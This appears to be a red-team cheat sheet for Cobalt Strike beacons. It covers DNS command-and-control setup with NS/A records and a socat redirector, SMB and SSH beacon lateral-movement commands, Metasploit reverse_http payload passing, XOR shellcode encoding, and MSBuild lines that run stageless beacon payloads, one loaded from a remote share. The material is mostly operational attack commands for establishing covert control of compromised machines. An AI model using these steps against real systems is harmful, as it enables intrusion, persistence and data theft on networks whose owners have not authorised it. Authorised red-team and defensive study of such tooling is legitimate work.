Cobalt Strike - Beacons

DNS Beacon

DNS Configuration

• Edit the Zone File for the domain
• Create an A record for Cobalt Strike system
• Create an NS record that points to FQDN of your Cobalt Strike system

Your Cobalt Strike team server system must be authoritative for the domains you specify. Create a DNS A record and point it to your Cobalt Strike team server. Use DNS NS records to delegate several domains or sub-domains to your Cobalt Strike team server's A record.

Example of DNS on Digital Ocean:

NS  example.com                     directs to 10.10.10.10.            86400
NS  polling.campaigns.example.com   directs to campaigns.example.com.   3600
A   campaigns.example.com           directs to 10.10.10.10              3600 

After creating a DNS listener (Beacon DNS), verify that your domains resolve to 0.0.0.0

• nslookup jibberish.beacon polling.campaigns.domain.com
• nslookup jibberish.beacon campaigns.domain.com

If you have trouble with DNS, you can restart the systemd service and force Google DNS nameservers.

systemctl disable systemd-resolved
systemctl stop systemd-resolved
rm /etc/resolv.conf
echo "nameserver 8.8.8.8" >  /etc/resolv.conf
echo "nameserver 8.8.4.4" >>  /etc/resolv.conf

DNS Redirector

socat -T 1 udp4-listen:53,fork udp4:teamserver.example.net:53

Debug the DNS queries with tcpdump -l -n -s 5655 -i eth0 udp port 53.

DNS Mode

Mode	Description
mode dns-txt	DNS TXT record data channel (default)
mode dns	DNS A record data channel
mode dns6	DNS AAAA record channel

SMB Beacon

link [host] [pipename]
connect [host] [port]
unlink [host] [PID]
jump [exec] [host] [pipe]

SMB Beacon uses Named Pipes. You might encounter these error code while running it.

Error Code	Meaning	Description
2	File Not Found	There is no beacon for you to link to
5	Access is denied	Invalid credentials or you don't have permission
53	Bad Netpath	You have no trust relationship with the target system. It may or may not be a beacon there.

SSH Beacon

# deploy a beacon
beacon> help ssh
Use: ssh [target:port] [user] [pass]
Spawn an SSH client and attempt to login to the specified target

beacon> help ssh-key
Use: ssh [target:port] [user] [/path/to/key.pem]
Spawn an SSH client and attempt to login to the specified target

# beacon's commands
upload                    Upload a file
download                  Download a file
socks                     Start SOCKS4a server to relay traffic
sudo                      Run a command via sudo
rportfwd                  Setup a reverse port forward
shell                     Execute a command via the shell

Metasploit compatibility

• Payload: windows/meterpreter/reverse_http or windows/meterpreter/reverse_https
• Set LHOST and LPORT to the beacon
• Set DisablePayloadHandler to True
• Set PrependMigrate to True
• exploit -j

Custom Payloads

* Attacks > Packages > Payload Generator 
* Attacks > Packages > Scripted Web Delivery (S)
$ python2 ./shellcode_encoder.py -cpp -cs -py payload.bin MySecretPassword xor
$ C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Temp\dns_raw_stageless_x64.xml
$ %windir%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe \\10.10.10.10\Shared\dns_raw_stageless_x86.xml

References

• Cobalt Strike > User Guide > DNS Beacon
• Simple DNS Redirectors for Cobalt Strike - Thursday 11 March, 2021
• CobaltStrike DNS Beacon Lab Setup - rioasmara - March 18, 2023

Share this content